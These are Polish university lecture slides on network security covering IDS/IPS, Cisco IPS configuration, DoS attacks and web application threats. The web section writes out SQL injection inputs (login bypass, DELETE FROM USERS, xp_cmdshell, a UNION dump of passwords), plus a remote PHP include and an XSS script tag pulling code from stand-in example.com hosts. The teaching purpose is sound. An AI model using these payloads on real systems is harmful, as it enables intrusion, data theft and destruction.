Bezpieczeństwo Systemów Sieciowych

Bezpieczeństwo Systemów Sieciowych dr inż. Łukasz Sturgulewski, luk@kis.p.lodz.pl, http://luk.kis.p.lodz.pl/ dr inż. Andrzej Frączyk, a.fraczyk@kis.p.lodz.pl BSS - v2013 1

Co dalej? IDS, IPS Application Firewall (zagrożenia w warstwie aplikacji głównie web w tym także DNS oraz PKI) TOR, Sandbox, Honeypot Backup BSS - v2013 2

Zagrożenia BSS - v2013 3

IDS/IPS IDS (ang. Intrusion Detection System) IPS (ang. Intrusion Prevention System) BSS - v2013 4

zero-day BSS - v2013 5

zero-day Nowy wirus (robak, trojan) wcześniej wolna propagacja, dziś błyskawiczna. Nowa dziura w sofcie (usługach, bazach, itp. itd.): odkrycie, użycie (wcześniejszy rekonesans pozwala stwierdzić z czego korzysta nasz cel), załatanie. BSS - v2013 6

IDS Przed IDS admin siedzi i przegląda ruch (logi), dokonuje analizy i podejmuje decyzje. System IDS pasywne monitorowanie ruchu w sieci. Tryb offline i inline. BSS - v2013 7

IDS - offline Przekierowanie kopii ruchu do sensora, analiza ruchu. Porównanie ruchu z sygnaturami. Wysłanie alarmu do stacji MC. BSS - v2013 8

IDS - offline Zalety: Brak wpływu na wydajność sieci, urządzeń. Wady: Szkodliwy ruch dotrze do celu (można połączyć IDS z urządzeniami sieciowymi aby zapewnić reakcję). BSS - v2013 9

IDS - inline Właściwy ruch przez niego przechodzi, nie kopia. Nie blokuje szkodliwego ruchu. Wysyła alerty do stacji MC. BSS - v2013 10

IPS - inline Ruch przepływa przez sensor. Porównanie ruchu z sygnaturami. Wysłanie alarmu do stacji MC. Blokowanie ruchu. BSS - v2013 11

IPS - inline Zalety: Blokowanie szkodliwego ruchu. Wady: Negatywny wpływ na wydajność. Gubione pakiety jeśli źle skonfigurowany. False positive BSS - v2013 12

IDS, IPS Sensor IDS lub IPS może być jednym z urządzeń: Router z systemem IOS IPS Dedykowane urządzenie IDS lub IPS Moduł dodatkowy zainstalowany w: firewall, router, switch. BSS - v2013 13

IDS, IPS IDS, IPS używa sygnatur aby wykrywać wzorce nadużyć w ruchu sieciowym. Sygnatura jest zbiorem zasad, które IDS, IPS wykorzystuje do wykrycia zagrożenia. Sygnatury pozwalają na detekcję szerokiego zakresu ataków, nieprawidłowości. IDS, IPS wykrywają: atomic signature patterns (single-packet), composite signature patterns (multipacket). BSS - v2013 14

IDS vs IPS IDS: Brak wpływu na sieć: opóźnienia, zmienność opóźnienia, uszkodzenie sensora, przeciążenie sensora. IPS: Zatrzymanie szkodliwego ruchu (od pierwszego pakietu); bezpośredni wpływ, regulacja ruchu. IDS: Zatrzymanie szkodliwego ruchu wymaga współpracy z innymi urządzeniami. IPS: Wpływa na sieć: opóźnienia, zmienność opóźnienia, uszkodzenie sensora, przeciążenie sensora. BSS - v2013 15

IDS vs IPS IDS i IPS: wymagają starannego dostrojenia: Sygnatury Dozwolone poziomy Reakcja (podejmowane działania) IPS inline szybka inspekcja IDS offline dokładna, szczegółowa inspekcja BSS - v2013 16

Network Intrusion Prevention System (NIPS) BSS - v2013 17

Host Intrusion Prevention System (HIPS) HIPS skanuje logi, pliki systemowe, zasoby w tym rejestr i procesy. Zaleta: możliwość monitorowania systemu operacyjnego, procesów, plików. Łączy analizę behawioralną z sygnaturami oraz funkcjami antywirusa, firewall sieciowego i aplikacyjnego. BSS - v2013 18

Składniki HIPS HIPS składa się z dwóch komponentów: Management Center serwer; Do zarządzania dla admina. Security Agent hosty; Agent działa używając zbioru polityk zdefiniowanych indywidualnie dla niego. BSS - v2013 19

Działanie HIPS BSS - v2013 20

Przykład HIPS ESET NOD32 BSS - v2013 21

HIPS analiza Sygnatury Poziomy Zachowanie BSS - v2013 22

HIPS Zalety: Wynik ataku (powodzenie, porażka) znane jest natychmiast. Nie troszczy się o typowe ataki L3 zajmuje się tym OS. Dostęp do ruchu nieszyfrowanego. Wady: Wpływ na wydajność stacji roboczej. HIPS nie dostarcza kompletnego obrazu sieci. HIPS powinien być uruchomiony na wszystkich hostach. Wymagane wsparcie dla szerokiej gamy systemów operacyjnych. BSS - v2013 23

HIPS vs NIPS Raczej jako uzupełnienie a nie konkurencja. BSS - v2013 24

Network-Based Intrusion Detection Sensory są umieszczane w wybranych punktach sieci aby w nich monitorować / weryfikować ruch pod kątem bezpieczeństwa. BSS - v2013 25

IPS Ochrona IPS: IOS na urządzeniu IPS jest okrojony do niezbędnych usług/procesów (dodatkowo chronionych). Cel: wydajność i bezpieczeństwo (hardening). Elementy typowego IPS: Network Interface Card (NIC) Procesor Pamięć operacyjna im bardziej rozbudowane śledzenie tym większe zapotrzebowanie. BSS - v2013 26

Network-Based Intrusion Detection Network IPS zapewnia bezpieczeństwo sieci w czasie rzeczywistym: wzrost liczby zasobów (węzłów) nie ma krytycznego znaczenia (także kosztów), nowy sensor konieczny tylko w przypadku dużego wzrostu ruchu w chronionym segmencie sieci. Dodanie nowej sieci wymusza dodanie nowego sensora łatwa procedura. BSS - v2013 27

Network-Based Intrusion Detection Routery ze zintegrowanymi usługami: Bez dodatkowych modułów (tylko wersja systemu operacyjnego) problem pamięci i wydajności. Dodatkowe moduły np. IPS Advanced Integration Module (AIM) lub Network Module Enhanced (IPS NME). Dedykowane urządzenie IPS np. IPS 4200 seria (najwyższa wydajność, najwięcej rozpoznawanych zagrożeń, najszerszy zakres metod inwigilacji ruchu). Firewall: Bez dodatkowych modułów problem pamięci i wydajności. Dodatkowe moduły np. Inspection and Prevention Security Services Module (ASA AIP-SSM). Przełącznik sieciowy L3, modularny np. Catalyst 6500 z modułem Intrusion Detection System Services Module (IDSM-2). BSS - v2013 28

Cisco IDS Network Module BSS - v2013 29

Cisco IDSM-2 BSS - v2013 30

Cisco IPS 4240 BSS - v2013 31

Cisco BSS - v2013 32

IPS co wybrać? Wiele czynników może decydować o wyborze IPS: wolumen ruchu sieciowego, topologia sieci, budżet, wykwalifikowani pracownicy. BSS - v2013 33

HIPS vs Network IPS Zalety NetIPS: Koszty (efektywne wykorzystanie). Przezroczysty dla urządzeń i usług. Niezależność od OS. Możliwość śledzenia ruchu na poziomie najniższych warstw modelu OSI. Wady NetIPS: Wpływ na wydajność sieci (opóźnienia). Problem inwigilacji ruchu szyfrowanego. Brak wiedzy czy atak zakończył się sukcesem. BSS - v2013 34

HIPS vs Network IPS Zalety HIPS: Reguły dobrane do węzła (hosta, serwera, inne) Inwigilacja ruchu szyfrowanego. Inwigilacja na poziomie aplikacji. Wady HIPS: Zależność od OS. Niższe warstwy modelu OSI nie są widoczne. Host jest widoczny dla intruza. BSS - v2013 35

IPS Aby zatrzymać szkodliwy ruch sieć musi go zidentyfikować. Najczęściej ruch ten różni się od ruchu prawidłowego. Sygnatury i poziomy pozwalają identyfikować robaki, wirusy, exploity, anomalie w protokołach, szkodliwy ruch, ataki DoS, itp. itd... Sygnatury koncepcyjnie są zbliżone do plików typu virus.dat z definicjami wirusów - wykorzystywane przez antywirusy. BSS - v2013 36

IDS, IPS Gdy sensor znajdzie dopasowanie ruchu do sygnatury podejmuje akcje takie jak: logowanie zdarzeń, wysyłanie alarmów do aplikacji/stacji zarządzającej. Sygnatury posiadają trzy główne atrybuty: Type Trigger (alarm) Action BSS - v2013 37

Klasyfikacja sygnatur IDS, IPS BSS - v2013 38

Atomic proste sygnatury BSS - v2013 39

Compound (stateful) złożone sygnatury Sekwencja operacji rozrzucona na wiele węzłów w określonym oknie czasowym. Wysokie zapotrzebowanie na pamięć. event horizon okno czasowe. initial signature component pierwszy pakiet, podejrzany o bycie elementem złożonego ataku. BSS - v2013 40

IPS charakterystyka sygnatur Jeśli nowe zagrożenia zostaną zidentyfikowane, nowe sygnatury muszą być opracowane i załadowane do IPS. Plik sygnatur zawiera paczkę sygnatur stanowiącą update dla systemu IPS. BSS - v2013 41

IPS sygnatura 1102.0 (LAND atak) IOS-S556-CLI.pkg (linia 0160) BSS - v2013 42

Grupowanie sygnatur Aby skanowanie sygnatur było bardziej efektywne system IOS opiera się na micro-engines (SME), które kategoryzują sygnatury w grupy. Kiedy IDS, IPS jest włączony, załadowany jest SME. Do sprawnego działania SME wymaga skompilowanych sygnatur. SME wyciąga określone wartości z pakietów i przekazuje do REE (Regular Expression Engine). REE potrafi jednoczasowo wyszukiwać wiele wzorców. Liczba dostępnych SME zależy od platformy. Cisco IOS Release 12.4(6)T definiuje 5 micro-engines: Atomic weryfikacja pojedynczych pakietów np. ICMP, UDP. Service weryfikacja usług. String weryfikacja określonych wyrażeń regularnych w celu wykrycia intruzów. Multi-string - weryfikacja elastyczna wielu wyrażeń oraz sygnatur Trend Labs. Other różne, inne sygnatury. BSS - v2013 43

Grupowanie sygnatur BSS - v2013 44

Sygnatury - Update Mniej istotne publikowane tygodniowo. Istotne publikowane natychmiast. Przykład: plik IOS-S361-CLI.pkg zawiera wszystkie sygnatury z pliku IOS-S360-CLI.pkg plus nowe sygnatury minus sygnatury nieaktualne. Pobieranie ręczne i automatyczne. BSS - v2013 45

Bezpieczeństwo systemu sieciowego IDS, Firewall router, dedykowane urządzenia, Virtual Private Network (VPN), Network Admission Control (NAC), IPS. BSS - v2013 46

Alarmy sygnatur Alarm sygnatury = alarm, trigger Jakie czujki mamy w systemie? W domu mamy czujki ruchu, czujki zbicia szyby, itp. itd. IPS ( full wypas ) ma: Pattern-based detection Anomaly-based detection Policy-based detection Honey pot-based detection Dekodowanie protokołów bardziej szczegółowa inwigilacja, weryfikacja zgodności ze standardami. BSS - v2013 47

Pattern-based detection Pattern-based detection = signature-based detection, jest najprostszym mechanizmem, wyszukiwanie specyficznych, predefiniowanych wzorców. Wykrywanie w: single packet (atomic) sequence of packets (composite). Wzorce mogą być łączone z określonymi usługami bądź portami. Nie zawsze to się jednak sprawdza konie trojańskie, które później atakują inne wewnętrzne zasoby, backdoor. BSS - v2013 48

Anomaly-based Detection Anomaly-based detection = profile-based detection Prawidłowy profil użytkownika jest tworzony poprzez monitorowanie jego aktywności w sieci w określonym czasie. Profil także może uwzględniać specyfikacje takie jak RFC. Po określeniu profilu (normalna aktywność), sygnatura wyzwala akcję jeśli badany ruch nie zawiera się w profilu (zwykłe reguły, sieci neuronowe, rozpoznawanie obrazów). Problemy: A co gdy user zmieni zachowanie? A co z atakami w trakcie uczenia? Trudność w łączeniu anomalii z konkretnym atakiem wymagana dokładna, dodatkowa analiza. Atak może być zaklasyfikowany jako normalny ruch. Metody klasyfikacji: zwykłe reguły, sieci neuronowe, rozpoznawanie obrazów. BSS - v2013 49

Anomaly-Based Detection BSS - v2013 50

Policy-based Detection Zbliżone do pattern-based detection, admin definiuje prawidłowe zachowania na podstawie zgromadzonych danych historycznych o aktywności pracowników. BSS - v2013 51

Honey pot-based Detection Honey pot-based detection - używa atrapy, przynęty serwera w celu: odciągnięcia uwagi od ważnych zasobów, dokładnej analizy (śledzenie) działań intruza. Rzadziej używany w sieciach produkcyjnych. Używane głównie w celach badawczych np. producenci softu z zakresu bezpieczeństwa. BSS - v2013 52

IPS typy alarmów BSS - v2013 53

IDS / IPS Detection Identifies malicious attacks on network and host resources. Prevention Stops the detected attack from executing. Reaction Immunizes the system from future attacks from a malicious source. BSS - v2013 54

IPS poziom ważności alarmu Administrator może wybrać z kilku poziomów ważności dla zagrożeń, sygnatur: High (atak, DoS) Informational (niebezpośredni atak) Low (nietypowy ruch w sieci, nie prowadzący do bezpośredniego ataku) Medium (nietypowy ruch w sieci, prowadzący do bezpośredniego ataku) Dobranie poziomów do sieci aby ograniczać false positive. BSS - v2013 55

IPS odpowiedź systemu (typy alarmów) Kiedy wykryte zostanie zagrożenie możliwych jest kilka działań: Generowanie alarmu (alarm, alarm + pakiet). Logowanie aktywności (atakujący, atakowany, obaj). Odrzucanie, zapobieganie aktywności (atakujący, połączenie, pakiet). Resetowanie połączenia TCP (RST). Blokowanie przyszłej aktywności. Zezwolenie na aktywność. Działania zależą głównie od sygnatury. BSS - v2013 56

IPS odpowiedź systemu Network Management Console 4 Alarm 2 1 Attack Drop Packet 3 Reset Connection BSS - v2013 57

Generowanie alarmów Monitorowanie alarmów jest bardzo ważne, pozwala na wykrycie i zrozumienie tego co stało się w systemie. Intruz może zalać system fałszywymi alarmami aby zaciemnić, odciągnąć uwagę od właściwego ataku. Systemy IPS najczęściej udostępniają dwa tryby alarmów, ostrzeżeń: Atomic alerts generowany zawsze gdy sygnatura zostanie wyzwolona. Czasem użyteczne (natychmiast widać co i jak często występowało), czasem kłopotliwa w analizie (gdy dużo zdarzeń). Summary alert pojedynczy alarm zwierający wiele wystąpień tej samej sygnatury z tego samego źródła na ten sam port. Ogranicza liczbę alarmów, rozjaśnia obrazów, nie obciąża sieci i systemów. BSS - v2013 58

Logowanie aktywności Czasem brak pewności co do szkodliwości ruchu, w takiej sytuacji warto logować podejrzaną aktywność w celu dalszej (offline) analizy. Admin posiada/dodał sygnaturę wyszukującą ciąg znaków /etc/password z akcją logowanie. Gdy ciąg się pojawi cały ruch z tego adresu przez określony czas (albo liczbę bajtów) jest logowany. Co umożliwia późniejszą, dokładną analizą danych co dalej robił podejrzany. BSS - v2013 59

Odrzucanie, zapobieganie aktywności Kluczowym działaniem IPS jest odrzucanie (drop) pakietów zapobieganie aktywności. Pozwala zatrzymać atak zanim wyrządzi on szkody w systemie. Nie tylko jeden pakiet, ale cały strumień, albo cały ruch od intruza. Możliwa współpraca z innymi urządzeniami w celu blokowania ruchu. BSS - v2013 60

Resetowanie połączenia TCP Typowe działanie mające na celu zakończenie połączenia TCP poprzez wygenerowanie pakietu TCP z ustawioną flagą RST. Często stosuje się łącznie deny + RST. BSS - v2013 61

Blokowanie przyszłej aktywności Blokowanie przyszłej aktywności np. poprzez wpływ na ACL na urządzeniach sieciowych. ACL może zatrzymać ruch od intruza bez angażowania zasobów systemu IPS. Po określonym okresie czasu IPS usuwa ACL. Dodatkowo możliwość ochrony całej sieci zagrożenie wykryte w jednym segmencie = ACL dla całej sieci. BSS - v2013 62

Zezwolenie na aktywność Akcja wymagana gdy admin chce zdefiniować wyjątki dla wybranych sygnatur. BSS - v2013 63

IPS zarządzanie i monitorowanie Monitorowanie incydentów bezpieczeństwa pozwala adminowi: zidentyfikować atak, określić naruszenia polityki bezpieczeństwa. BSS - v2013 64

IPS zarządzanie i monitorowanie Management Method: Sensory mogą być zarządzane indywidualnie albo centralnie. Event correlation: Proces korelowania ataków i innych zdarzeń, które wydarzyły się jednocześnie w różnych punktach sieci. (scentralizowany system + NTP + analiza danych). Security Staff: Wykwalifikowana kadra jest konieczna aby prawidłowo analizować i oceniać skuteczność IPS także dostrajać i optymalizować. Incident Response Plan: Skutecznie zaatakowany system powinien być przywrócony do stanu sprzed ataku. BSS - v2013 65

IPS zarządzanie i monitorowanie Konfiguracja: CLI GUI Zarządzanie lokalne (przykłady dla Cisco): Cisco Router and Security Device Manager (SDM) Cisco IPS Device Manager (IDM) Zarządzanie scentralizowane (przykłady dla Cisco): Cisco IDS Event Viewer (IEV) Cisco Security Manager (CSM) Cisco Security Monitoring, Analysis, and Response System (MARS) BSS - v2013 66

IPS logowanie zdarzeń Po wykryciu ataku IOS IPS może wysłać wiadomość w formacie Syslog lub Secure Device Event Exchange (SDEE). %IPS-4-SIGNATURE:Sig:1107 Subsig:0 Sev:2 RFC1918 address [192.168.121.1:137 ->192.168.121.255:137] BSS - v2013 67

IPS - podsumowanie Aktualizacja sygnatur: ręczna automatyczna BSS - v2013 68

Configuration Tasks on Cisco IOS Install Cisco IOS IPS on the router. Specify location of the Signature Definition File (SDF). Create an IPS rule. Attach a policy to a signature (Optional). Apply IPS rule at an interface. Configure Logging using Syslog or SDEE. Verify the configuration. BSS - v2013 69

Specify Location of SDF Router (config)# ip ips sdf location url (Optional) Specifies the location in which the router will load the SDF, attack-drop.sdf. If this command is not issued, the router will load the default, built-in signatures. Router(config)# ip ips sdf location disk2:attack-drop.sdf BSS - v2013 70

Create an IPS Rule Router (config)# ip ips name ips-name [list acl] Creates an IPS rule. Router(config)# ip ips name MYIPS Creates an IPS rule named MYIPS that will be applied to an interface. BSS - v2013 71

Attach a policy to a given signature (optional) Router (config)# ip ips signature signature-id [:sub-signature-id] {delete disable list acl-list} Attaches a policy to a given signature. Router(config)# ip ips signature 1000 disable Disables signature 1000 in the signature definition file. BSS - v2013 72

Apply an IPS Rule at an Interface Router (config-if)# ip ips ips-name {in out} Applies an IPS rule at an interface. Router(config-if)# ip ips MYIPS in BSS - v2013 73

Upgrade to Latest SDF Router (config)# ip ips name ips-name Creates an IPS rule. Router (config)# no ip ips sdf builtin Instructs the router not to load the built-in signatures. Router (config)# ip ips fail closed Instructs the router to drop all packets until the signature engine is built and ready to scan traffic. BSS - v2013 74

Upgrade to Latest SDF(Cont.) Router (config-if)# ip ips ips-name {in out} [list acl] Applies an IPS rule at an interface. This command automatically loads the signatures and builds the signature engines. BSS - v2013 75

Monitoring Cisco IOS IPS Signatures Network Management Console Alarm SDEE Protocol Alert Syslog Syslog Server BSS - v2013 76

SDEE Benefits (Security Device Event Exchange) Vendor Interoperability SDEE will become the standard format for all vendors to communicate events to a network management application. This lowers the cost of supporting proprietary vendor formats and potentially multiple network management platforms. Secured transport The use of HTTP over SSL or HTTPS ensures that data is secured as it traverses the network BSS - v2013 77

Set Notification Type Router (config)# ip ips notify [log sdee] Sets notification type Router(config)# ip ips notify sdee Router(config)# ip ips notify log Router (config)# ip sdee events num_of_events Sets the maximum number of SDEE events that can be stored in the event buffer. BSS - v2013 78

show Commands Router# show ip ips configuration Verifies that Cisco IOS IPS is properly configured. Router# show ip ips signatures [detailed] Verifies signature configuration, such as signatures that have been disabled. Router# show ip ips interface Display the interface configuration. BSS - v2013 79

clear Commands Router# clear ip ips configuration Remove all intrusion prevention configuration entries, and release dynamic resources. Router# clear ip ips statistics Reset statistics on packets analyzed and alarms sent Router# clear ip sdee {events subscriptions} Clear SDEE events or subscriptions. BSS - v2013 80

debug Commands Router# debug ip ips timers Router# debug ip ips object-creation Router# debug ip ips object-deletion Router# debug ip ips function trace Router# debug ip ips detailed Router# debug ip ips ftp-cmd Router# debug ip ips ftp-token Router# debug ip ips icmp Router# debug ip ips ip Router# debug ip ips rpc Router# debug ip ips smtp Router# debug ip ips tcp Router# debug ip ips tftp Router# debug ip ips udp Instead of no, undebug may be used BSS - v2013 81

Configure Intrusion Prevention on the PIX Security Appliance BSS - v2013 82

Configure IDS pixfirewall(config)# ip audit name audit_name info [action [alarm] [drop] [reset]] Creates a policy for informational signatures. pixfirewall(config)# ip audit name audit_name attack [action [alarm] [drop] [reset]] Creates a policy for attack signatures. pixfirewall(config)# ip audit interface if_name audit_name Applies a policy to an interface. pixfirewall(config)# ip audit name ATTACKPOLICY attack action alarm reset pixfirewall(config)# ip audit interface outside ATTACKPOLICY When the PIX Security Appliance detects an attack signature on its outside interface, it reports an event to all configured Syslog servers, drops the offending packet, and closes the connection if it is part of an active connection. BSS - v2013 83

Specify Default Actions for Signatures pixfirewall(config)# ip audit attack [action [alarm] [drop] [reset]] Specifies the default actions for attack signatures. pixfirewall(config)# ip audit info [action [alarm] [drop] [reset]] Specifies the default actions for informational signatures. pixfirewall(config)# ip audit info action alarm drop When the PIX Security Appliance detects an info signature, it reports an event to all configured Syslog servers and drops the offending packet. BSS - v2013 84

Disable Intrusion Detection Signatures pixfirewall(config)# ip audit signature signature_number disable Excludes a signature from auditing. pixfirewall(config)# ip audit signature 6102 disable Disables signature 6102. BSS - v2013 85

DoS, DDoS Ping of death Teardrop Land UDP-flood Smurf (Fraggle) SYN Flood Attack (Naptha (FIN)) HTTP-flood (Slowloris) HTTP GET Flood BSS - v2013 86

SYN Flood Attack Atakujący podszywa się pod nieistniejący adres IP i zalewa cel pakietami SYN. Cel odpowiada na pakiety SYN poprzez wysłanie pakietów SYN-ACK na nieistniejący adres IP. Cel przepełnia swój bufor zbyt dużą liczbą embryonic connections i przestaje odpowiadać na prawidłowy ruch. BSS - v2013 87

SYN Flood Guard Configuration pixfirewall (config)# static [(prenat_interface, postnat_interface)] mapped_address interface real_address [dns][netmask mask][norandomseq][connection_limit [em_limit]] For inbound connections: Use the em_limit to limit the number of embryonic connections. Set the limit to a number lower than the server can handle. pixfirewall (config)# nat [(if-name)]id address [netmask [outside] [dns] [norandomseq] [timeout hh:mm:ss] [conn_limit [em_limit]]] For outbound connections: Use the em_limit to limit the number of embryonic connections. Set the limit to a number lower than the server can handle. pixfirewall(config)# nat (inside) 1 0 0 0 10000 pixfirewall(config)# static (inside,outside) 192.168.0.11 172.16.0.2 0 1000 BSS - v2013 88

Slow-Header Attack Ciąg dalszy nastąpił po 20s. http://blogs.citrix.com/2011/09/20/slow-header-attack-brought-down-many-sitesrecently- -know-how-to-protect-against-such-attacks-using-netscaler/ BSS - v2013 89

Slow-Post Attack http://blogs.citrix.com/2011/09/23/slow-post-attack-affects-applications-around-theworld- -know-how-to-protect-against-such-attacks-using-netscaler/ BSS - v2013 90

HTTP GET Flood Nie ma na celu wysycenia pasma. Ma na celu wysycenie zasobów serwera (CPU, memory). Zapytanie musi być tak przygotowane aby serwer musiał wykonać maksymalnie wiele operacji (zapytania do bazy danych, sesje SSL). Od czasu gdy HTTP GET Flood używa standardowych URL requests, stał się trudny do rozpoznania przez systemy IDS/IPS, szczególnie w wersji rozproszonej (DDoS). BSS - v2013 91

OWASP: HTTP Post Tool Open Web Application Security Project OWASP's guides are a great start towards building and maintaining secure applications. quickly, accurately, efficiently. https://www.owasp.org/index.php/owasp_http_post_tool BSS - v2013 92

DoS, DDoS - przeciwdziałanie http://niebezpiecznik.pl/symantec/jak-chronic-sie-przed-ddos-em/ 1. Zoptymalizuj swoją stronę. Im mniej zapytań do bazy danych i im mniej zasobów pobieranych z twoich serwerów podczas wizyty na twojej stronie, tym lepiej. 2. Statyczne treści (obrazki, skrypty js, arkusze stylów, pliki PDF) wystaw przy pomocy osobnego serwera, tzw. CDN (Content Delivery Network). 3. Rozważ CDN dla całego serwisu. Istnieją tanie rozwiązania takie jak darmowy Cloudflare. 4. Zastanów się nad loadbalancingiem. Krótko mówiąc, skaluj moc obliczeniową swoich serwerów. Żądanie zanim trafi do webserwera jest przechwytywane przez loadbalancer, który następnie decyduje do którego webserwera z farmy (klastra) je przekazać. Wirtualizacja i optymalizacja wykorzystania zasobów. 5. Skaluj łącze. Dynamiczny routing i kilka niezależnych łącz może pomóc w trakcie ataków DDoS. 6. Rozdziel usługi. DDoS-y z reguły dotykają stron WWW. 7. Ustal alternatywny kanał komunikacji, np. Facebook. BSS - v2013 93

CloudFlare is the next-generation CDN BSS - v2013 94

CloudFlare advanced DDoS protection Layer 3/4 attacks DNS amplification attacks SMURF attacks ACK attacks Layer 7 attacks BSS - v2013 95

IDS: Intrusion Deception System http://www.mykonossoftware.com/ BSS - v2013 96

Detekcja Zastawienie wielu pułapek w celu złapania intruza, już w czasie rekonesansu (przed atakiem szkodliwym). Wstawienie w przepływający ruch (aplikacje webowe zawierające URLe, formularze, pliki) detection points losowe i zmienne dane. Kiedy intruz zaczyna manipulować detection points zostaje złapany. detection points nie są związane z serwerem aplikacji, użytkownik także ich nie widzi. detection points zostaną zauważone przez intruza szukającego podatności na np. exploity. Aplikacja nie jest już pasywna! BSS - v2013 97

Śledzenie Po etapie detekcji następuje: Śledzenie: IP Wstrzyknięcie persistent token do przeglądarki intruza Fingerprinting maszyny intruza (jeśli używa softu albo skryptów) Rejestracja (PVR) BSS - v2013 98

Profil W czasie śledzenia budowany jest profil intruza: BSS - v2013 99

Reakcja Reakcje automatyczne, w czasie rzeczywistym: BSS - v2013 100

Aktualizacja systemu ochrony Dawne czasy: raz dziennie Dziś: natychmiast gdy zagrożenie wykryte Jak wykrywać zagrożenia? Ktoś musi dostarczyć próbkę A może lepiej pobierać dane z systemów klientów? BSS - v2013 101

Ochrona w czasie rzeczywistym inteligencja w chmurze BSS - v2013 102

ASA CX ASA Context Aware BSS - v2013 107

ASA CX BSS - v2013 108

ASA CX Zastosowanie: Styk z Internetem Kontrola aplikacji NGFW BSS - v2013 118

BSS - v2013 119

WAF Web Application Firewall: Cisco Web Security Appliance BSS - v2013 120

Web Security Appliance - Cache Web Proxy BSS - v2013 121

Aplikacje webowe W 2020 roku ponad 80% to aplikacje webowe! Główne, obecne zagrożenia: Injection Attacks, PHP Remote File Includes, Cross Site Scripting (XSS), Cross Site Request Forgeries (CSRF), Insecure Communications BSS - v2013 124

SQL Injection Imperva: SQLinjection has been responsible for 83% of successful hacking-related data breaches (2005-2012) Wstrzyknięcie Injection szkodliwych, spreparowanych przez intruza, danych do interpretera. Wyszukanie stron w aplikacji webowej, które akceptują wprowadzane przez użytkowników informacje w celu dostępu do bazy: login form, signup form, forgot password form, dynamiczne strony używające zmiennych w URL takich jak ID produktu. Włamania typu SQL injection wynikają z dwóch głównych przyczyn: braku lub niewystarczającej walidacji danych wejściowych, braku kodowania znaków specjalnych przed wstawieniem do zapytania SQL. BSS - v2013 125

Przykład SQL Injection Załóżmy że na stronie znajduje się następujący formularz: <form method="post" action="login.php"> Login: <input type="text" name="login"><br> Hasło: <input type="password" name="pass"><br> <input type="submit" value="zaloguj się"><br> </form> Po stronie serwera, w kodzie PHP tworzone i wykonywane jest następujące zapytanie: SELECT USER_ID FROM USERS WHERE (LOGIN='$login') AND (PASS='$pass') http://www.poradnik-webmastera.com/artykuly/bazy_danych/sql_injection.php BSS - v2013 126

Przykład SQL Injection Intruz wpisuje w pole hasło: ' OR '1'='1 Zapytanie, które zostanie wykonane będzie następujące: SELECT USER_ID FROM USERS WHERE (LOGIN='admin') AND (PASS='' OR '1'='1') http://www.poradnik-webmastera.com/artykuly/bazy_danych/sql_injection.php BSS - v2013 127

Przykład SQL Injection Intruz wpisuje: admin') -- Zapytanie, które zostanie wykonane będzie następujące: SELECT USER_ID FROM USERS WHERE (LOGIN='admin') --') AND (PASS='') http://www.poradnik-webmastera.com/artykuly/bazy_danych/sql_injection.php BSS - v2013 128

Przykład SQL Injection Intruz wpisuje: ') DELETE FROM USERS -- Zapytanie, które zostanie wykonane będzie następujące: SELECT USER_ID FROM USERS WHERE (LOGIN='') DELETE FROM USERS -- ') AND (PASS='') http://www.poradnik-webmastera.com/artykuly/bazy_danych/sql_injection.php BSS - v2013 129

Przykład SQL Injection Intruz wpisuje: '); exec master..xp_cmdshell 'iisreset /stop' -- Zapytanie, które zostanie wykonane będzie następujące: SELECT USER_ID FROM USERS WHERE (LOGIN=''); exec master..xp_cmdshell 'iisreset /stop' -- ') AND (PASS='') http://www.poradnik-webmastera.com/artykuly/bazy_danych/sql_injection.php BSS - v2013 130

Przykład SQL Injection Wyświetlenie listy zamówionych produktów za pomocą zapytania: SELECT PRODUKT_ID, NAZWA, OPIS, KWOTA FROM PRODUKTY, ZAMOWIENIA WHERE (PRODUKTY.PRODUKT_ID=ZAMOWIENIA.PRODUKT.ID) AND (KLIENT_ID=$id) ORDER BY NAZWA Wstrzyknięcie: 0 OR 1=1 http://www.poradnik-webmastera.com/artykuly/bazy_danych/sql_injection.php BSS - v2013 131

Przykład SQL Injection Dostęp do innych tabel, korzystając z instrukcji UNION: -1) UNION SELECT KLIENT_ID, LOGIN, HASLO, 0 FROM KLIENCI -- Zapytanie pozwoli zwrócić pełną listę listę loginów i haseł klientów sklepu: AND (KLIENT_ID=-1) UNION SELECT KLIENT_ID, LOGIN, HASLO, 0 FROM KLIENCI --) http://www.poradnik-webmastera.com/artykuly/bazy_danych/sql_injection.php BSS - v2013 132

SQL Injection SQL Injection można szukać innych tabel w bazie danych, oraz próbować określić typy ich kolumn. blind SQL injection kiedy wynik wstrzykniętego kodu nie jest prezentowany, wiemy tylko czy zapytanie zakończyło się sukcesem, czy niepowodzeniem. Wielofazowy atak SQL Injection: To zostało zakodowane (np. = ) przy zapisie do bazy, jest jednak odkodowywane przy odczycie, czyli można tego użyć do generowania szkodliwego zapytania BSS - v2013 133

Przykład: SQL Injection BSS - v2013 134

PHP Remote File Includes PHP to najpopularniejszy web application framework. Funkcja allow_url_fopen jest ulubioną przez intruzów funkcją, gdyż: pozwala uruchamiać ich skrypty na stronach ofiar, jest domyślnie włączona. Dostęp do choćby jednego pliku i dodanie w nim: include( http://www.example.com/malicious_code.php ) = sukces Rozwiązania: Wyłączenie a jeśli nie to: kontrola użycia, aktualizacja, śledzenie informacji o nowych podatnościach. BSS - v2013 135

Cross Site Scripting (XSS) Cross Site Request Forgeries (CSRF) Non-persistent Typowo niewinnie wyglądający URL prowadzący do zaufanej strony ale zawierający XSS. Jeśli zaufana strona jest podatna, po kliknięciu na link wstrzyknięty skrypt zostanie wykonany. Persistent Typowa aplikacja webowa ze stroną, w której użytkownik może umieszczać bezpośrednio tekst: Forums Comments Wikis Reviews Umieszczenie wpisu zwierającego JavaScript z innego serwera: <script src= http://www.example.com/malicious.js ></script>. Załadowanie strony zawierającej powyższy wpis. Jeśli skrypt się wykonał strona jest podatna. BSS - v2013 136

Cross Site Scripting (XSS) Cross Site Request Forgeries (CSRF) CSRF: Jeśli występuje podatność XSS to można dzięki obcym skryptom wykradać dane z maszyny ofiary np. ciasteczka, a jak intruz ma ciasteczko ma też sesję, a gdy ma sesję może w imieniu zaufanej osoby rozsyłać linki zawierające XSS (np. instalujące złośliwe oprogramowanie). Rozwiązanie: Nigdy nie ufaj danym wprowadzanym przez user a! Kasuj kod JavaScript wstawiany przez user a. Limituj i kontroluj tagi dostępne dla user a. BSS - v2013 137

Insecure Communications Brak SSL/TLS, SSH, innych BSS - v2013 138

Watering Hole wodopój BSS - v2013 139

